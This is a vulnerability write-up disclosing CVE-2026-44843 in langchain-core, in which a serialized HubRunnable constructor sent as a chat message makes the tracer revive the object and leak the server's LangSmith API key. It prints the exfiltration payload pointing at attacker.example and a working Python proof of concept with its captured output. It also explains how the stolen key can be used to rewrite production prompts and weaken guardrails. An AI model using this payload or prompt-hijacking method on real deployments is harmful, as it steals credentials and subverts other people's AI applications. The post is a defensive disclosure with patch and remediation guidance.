CVE-2026-44843: One Chat Message Steals Your Credentials. Then It Gets Worse!

How We Turned LangChain's Tracer Into an Unauthenticated Remote Credential Exfiltration Gadget

Dewank Pant

~10 min read · May 9, 2026 (Updated: May 9, 2026) · Free: Yes

By Dewank Pant and Shruti Lohani

Some vulnerabilities only become obvious when you stop looking at the model and start looking at the machinery around it.

The LLM was not the problem here. The prompt was not the problem either. The interesting bug was in the framework plumbing that sits around modern AI applications: tracing, memory, serialization, streaming, runtime metadata, and object revival.

For us, that piece of plumbing turned out to be the LangChain tracer.

What we found, and what is now tracked as CVE-2026-44843, is a chain that starts with a single chat message and ends with the attacker holding admin access to the victim application's LangSmith workspace, including write access to the production prompts that LangChain applications fetch at runtime.

In the deployment shape we analyzed, those conditions lined up naturally: a public LangServe-style endpoint, structured input preserved into run data, and affected runtime paths such as RunnableWithMessageHistory, astream_log, or astream_events(version="v1"). No authentication. No user interaction. No prior access.

This is the story of how we found the chain, how the gadget worked, and why the impact was bigger than a simple leaked tracing key. The issue was patched in langchain-core 1.3.3 and 0.3.85. If you run an older version in a public-facing LangChain or LangServe-style application, upgrade first.

Where we started

We were looking at how modern AI applications handle untrusted input.

Not just the prompt itself. Everyone looks at the prompt.

We were interested in the layers around the prompt: tracers, loggers, memory backends, streaming events, serialized objects, and runtime metadata. These components sit on the request path, but they are often treated as internal framework machinery rather than security boundaries.

That is exactly what made them interesting.

AI applications move a lot of structured data around. A single request can become a user message, a model input, a run object, a trace, a streaming patch, a memory entry, and a stored artifact. Somewhere along that path, data can change meaning.

A value that begins as user input can later be treated as framework state. That led us to the question that shaped the research:

Can attacker-controlled runtime data ever become a trusted LangChain object?

LangChain was a natural place to look. langchain-core is the foundational runtime under LangChain, LangGraph, and LangServe. LangSmith is the common observability and prompt-management layer around that ecosystem. Two defaults converging on the same request path is exactly the kind of place where a quiet bug ends up reaching a lot of production deployments at once.

So we started looking at the tracer.

The thing that did not look right

In langchain-core, the tracer is responsible for capturing the inputs and outputs of every run. When the run finishes, the tracer rehydrates those inputs and outputs from their stored form.

The path that caught our attention appeared in history and streaming-related logic, including _exit_history, _aexit_history, and related call sites used by astream_log and astream_events

Six call sites in total. All six used the same risky pattern:

inputs = load(run.inputs, allowed_objects="all")
output_val = load(run.outputs, allowed_objects="all")

load() is LangChain's deserializer. The allowed_objects="all" argument tells it that any class registered in LangChain's serializable mapping is fair game to instantiate.

That stopped us.

Not because this was arbitrary Python deserialization. It was not. LangChain's deserializer is narrower than pickle.loads. It will only revive classes that the project has explicitly registered. But "explicitly registered" turns out to mean 94 classes as of langchain-core 1.3.1, and the question we kept coming back to was:

Are all registered LangChain-serializable objects safe to construct with attacker-controlled arguments in this runtime context?

If even one registered class performs meaningful work during construction, then a constructor-shaped dictionary in the wrong runtime path may be enough to make the server perform that work under its own identity.

The bridge from "user input" to "deserializer"

The next question was whether run.inputs could actually be influenced by an attacker.

Tracers feel like internal infrastructure. The mental model most developers carry is that run.inputs is something the framework constructs from sanitized data, not something a user types. So we went looking for the path between a chat message and run.inputs.

In affected paths, structured input could be preserved as runtime data.

A simplified version of the relevant behavior looked like this:

def _get_chain_inputs(self, inputs: Any) -> Any:
    if self._schema_format in {"original", "original+chat"}:
        return inputs if isinstance(inputs, dict) else {"input": inputs}

If inputs was already a dictionary, it could be returned as-is. No escaping. No canonicalization. No hard separation between user-originated structure and framework-originated structure. .

Which means that if a user sends a chat message that happens to be a dict, that dict ends up on run.inputs exactly as the user wrote it. That mattered because LangChain serialized constructor objects have a recognizable shape:

{
  "lc": 1,
  "type": "constructor",
  "id": ["langchain", "schema", "runnable", "SomeClass"],
  "kwargs": { "...": "..." }
}

If this remains inert data, nothing interesting happens.

If it reaches a broad load() call, the framework may treat it as a construction request. The next step was to find a class on the allowlist that did something interesting in its constructor.

The class we did not expect to find

We started reading through the serializable mapping. Many entries were boring in the best possible way: message types, document types, and simple data containers.

Then we hit HubRunnable.

The interesting part was its initialization behavior. In simplified form, the constructor path looked like this:

def __init__(self, owner_repo_commit, *, api_url=None, api_key=None, **kwargs):
    from langchain_classic.hub import pull
    pulled = pull(owner_repo_commit, api_url=api_url, api_key=api_key)
    ...

That is not just object construction.

That is object construction with a network side effect!

HubRunnable makes an HTTP request during construction. It calls pull(), which constructs LangSmithClient(api_url=api_url, api_key=api_key) and issues a GET to <api_url>/commits/<owner>/<repo>/latest.

That is already interesting. An attacker who controls api_url controls the destination of an outbound HTTP request from the server. Classic SSRF attack.

But the moment that escalated the severity chain was when we read the LangSmith client's auth code.

The fallback that gives away the key

When LangSmithClient is constructed with api_key=None, it does not error out, and it does not skip authentication. It looks up the key from the environment instead, in this order: LANGSMITH_API_KEY, then LANGCHAIN_API_KEY.

That is normal client behavior in trusted application code.

Inside this chain, it becomes the vulnerability.

The attacker sends a chat message containing a serializedHubRunnable constructor dict. The attacker controls api_url. The attacker deliberately omits api_key. The tracer hits load(), instantiates HubRunnable, which calls pull(), which constructs a LangSmith client, which reads LANGSMITH_API_KEY from the server's own environment, and sends it to the attacker's URL in an x-api-key header.

The chain becomes:

attacker sends structured payload
  -> payload survives as runtime data
  -> runtime path calls broad load()
  -> HubRunnable is revived
  -> HubRunnable triggers LangSmith client behavior
  -> client reads API key from server environment
  -> client sends request to attacker-controlled URL
  -> API key appears in an x-api-key header

The exfiltration request fires during object revival. That timing matters, as the application's normal output filtering, response lifecycle, or exception handling does not get a meaningful chance to stop it. By the time the constructor path fails or raises, the credential has already been sent.

The payload:

{
  "lc": 1,
  "type": "constructor",
  "id": ["langchain", "schema", "runnable", "HubRunnable"],
  "kwargs": {
    "owner_repo_commit": "a/b",
    "api_url": "http://attacker.example/"
  }
}

That is a simplified payload. The key detail is that api_key is omitted. That omission causes the client path to fall back to the victim server environment, leading to remote unauthenticated credential exfiltration.

Proving it

We wrote a small PoC. It runs a one-shot listener on 127.0.0.1:19996, builds a minimal RunnableWithMessageHistory-wrapped chain, drops a sentinel LANGSMITH_API_KEY into the environment, and sends the payload above as a chat input.

import os, socket, threading, time, importlib
SENTINEL_KEY = "lsv2_pt_SENTINEL_LEAK_0xDEADBEEF"
os.environ["LANGSMITH_API_KEY"] = SENTINEL_KEY
os.environ["LANGCHAIN_API_KEY"] = SENTINEL_KEY
os.environ["LANGSMITH_TRACING"] = "false"
captured = {"bytes": b""}
def listener():
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 19996)); s.listen(1); s.settimeout(10)
    conn, _ = s.accept(); conn.settimeout(2); buf = b""
    while b"\r\n\r\n" not in buf:
        try:
            chunk = conn.recv(8192)
            if not chunk: break
            buf += chunk
        except socket.timeout: break
    captured["bytes"] = buf
    conn.sendall(b"HTTP/1.1 500 x\r\nContent-Length: 0\r\n\r\n")
    conn.close()
threading.Thread(target=listener, daemon=True).start()
time.sleep(0.2)
L = importlib.import_module("langchain_core.load.load")
L.DEFAULT_NAMESPACES.append("langchain_classic")
L.ALL_SERIALIZABLE_MAPPINGS[("langchain", "schema", "runnable", "HubRunnable")] = (
    "langchain_classic", "runnables", "hub", "HubRunnable",
)
from langchain_core.runnables import RunnableLambda, RunnableWithMessageHistory
from langchain_core.chat_history import InMemoryChatMessageHistory
from langchain_core.messages import AIMessage
chain = RunnableWithMessageHistory(
    RunnableLambda(lambda x: AIMessage(content="ok")),
    lambda sid: InMemoryChatMessageHistory(),
)
payload = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "schema", "runnable", "HubRunnable"],
    "kwargs": {
        "owner_repo_commit": "a/b",
        "api_url": "http://127.0.0.1:19996",
    },
}
try:
    chain.invoke([payload], config={"configurable": {"session_id": "poc"}})
except Exception:
    pass  # HubRunnable raises after the exfil; the key is already gone.
time.sleep(1)
out = captured["bytes"].decode("utf-8", errors="replace")
print(out[:600])
print("LEAKED" if SENTINEL_KEY in out else "no leak")

The first time we ran it, the listener printed:

GET /commits/a/b/latest HTTP/1.1
Host: 127.0.0.1:19996
User-Agent: langsmith-py/0.7.33
x-api-key: lsv2_pt_SENTINEL_LEAK_0xDEADBEEF
LEAKED!

Tested in a local affected environment with a sentinel key, after coordinated disclosure and patch release.

There was that small moment of "oh."

We thought it ended there. It did not.

At first, stealing a tracing key sounds bounded. Bad, but bounded. Rotate the key, review traces, move on.

That is how we initially scoped the impact. Then we read the LangSmith documentation on permissions, and the chain got worse.

The stolen token is not merely a tracing credential. A LANGSMITH_API_KEY carries authority across the entire LangSmith workspace: read access to all trace data, write access to the Prompt Hub, and delete access on datasets, projects, and prompts (In Developer organizations, every user is assigned Organization Admin by default.).

LangChain applications routinely call hub.pull("user/prompt_name") at runtime to fetch their production system prompts. If those prompts live in the compromised workspace (and most teams using LangChain plus LangSmith do exactly that), the attacker can issue a single API call and silently overwrite the prompt body. From that point forward, every request the victim application serves runs against an attacker-controlled prompt.

The attacker can rewrite system instructions. They can change tool-use rules. They can weaken or remove guardrails. They can inject exfiltration payloads into the model's instructions so user data leaks on every response. They can simply make the model lie about specific topics to specific users.

There is no entry in the application's own logs that distinguishes a hijacked prompt from a legitimate update.

That is why we treated the exploit chain as more severe than a simple outbound request bug.

The credential was the entry point.

The prompt store was the persistence layer.

HubRunnable was the live gadget. The surface was wider.

HubRunnable was the class we proved end to end. But the primitive exposed by the tracer was not limited to one class.

At the time of our submission, SERIALIZABLE_MAPPING contained 94 registered classes. The tracer's load(..., allowed_objects="all") call made every one of them relevant if attacker-controlled data could reach the loader.

Any class whose __init__, model_post_init, or Pydantic @model_validator performs side effects under the server's identity, including network calls, credential lookups, or client construction, was a potential gadget.

HubRunnable was the live counterexample.

The important fix was therefore not "block this one payload."

The important fix was to close the sink by ensuring broad object revival is not applied implicitly to attacker-controllable runtime payloads.

The broader issue: data becoming behavior

The most important thing CVE-2026-44843 points to is a design principle that gets violated quietly across a lot of modern AI stacks.

In AI frameworks, the boundary between data and behavior is a security boundary.

A chat message is not always just text. A trace is not always just observability data. A memory entry is not always passive history. A serialized object is not always inert configuration. A prompt artifact is not always just content.

In a modern LangChain application, all of those things can influence execution: model context, tool calls, prompt construction, evaluation pipelines, and future user interactions.

So the security question for AI systems is not only "can the attacker execute code?"

It is also: "can the attacker make the framework reinterpret data as trusted control?"

CVE-2026-44843 is a concrete example of exactly that. The attacker never executed arbitrary code. They sent a structured dictionary that the framework later decided to treat as a constructor manifest for a trusted class. That class then did trusted work with attacker-supplied arguments.

Reporting and what got fixed

We reported the chain to the LangChain security team in April 2026 through the standard GitHub Security Advisory process. They triaged and assigned CVE-2026-44843, and shipped fixes in langchain-core 1.3.3 and 0.3.85. The full published advisory is GHSA-pjwx-r37v-7724.

The patch narrows the deserialization sink so broad object revival is not implicitly applied to attacker-controllable runtime payloads. The advisory also deprecates the affected older runtime APIs:

RunnableWithMessageHistory
astream_log()
astream_events(version="v1")

What to do if you ran an affected version

Upgrade. langchain-core 1.3.3 , langchain-core 0.3.85 .

Beyond the upgrade, three things are worth doing if you operated a public-facing LangServe-shaped endpoint on an affected version at any point during the exposure window.

Rotate LangSmith and LangChain credentials

If your application exposed an affected public endpoint and used LANGSMITH_API_KEY or LANGCHAIN_API_KEY, treat those credentials as potentially exposed.

The exfiltration request is fast and may not leave obvious evidence in application logs.

Audit Prompt Hub artifacts

If your application uses hub.pull() or otherwise fetches prompts or runnable artifacts from LangSmith at runtime, verify that those artifacts have not been modified unexpectedly.

Compare them against a version-controlled source of truth outside the workspace.

Validate request bodies into inert schemas

Do not allow arbitrary nested dictionaries from users to survive into framework runtime data unless the application explicitly needs that structure.

If a field should be a string, coerce it to a string.

If a request should match a fixed schema, reject extra structure.

Do not pass user-controlled data to load() or loads().

This writeup describes a vulnerability that is patched at the time of publication. The PoC is provided for defensive verification on affected, unpatched test environments only.

#ai #security #langchain #information-security #ai-agent

< Go to the original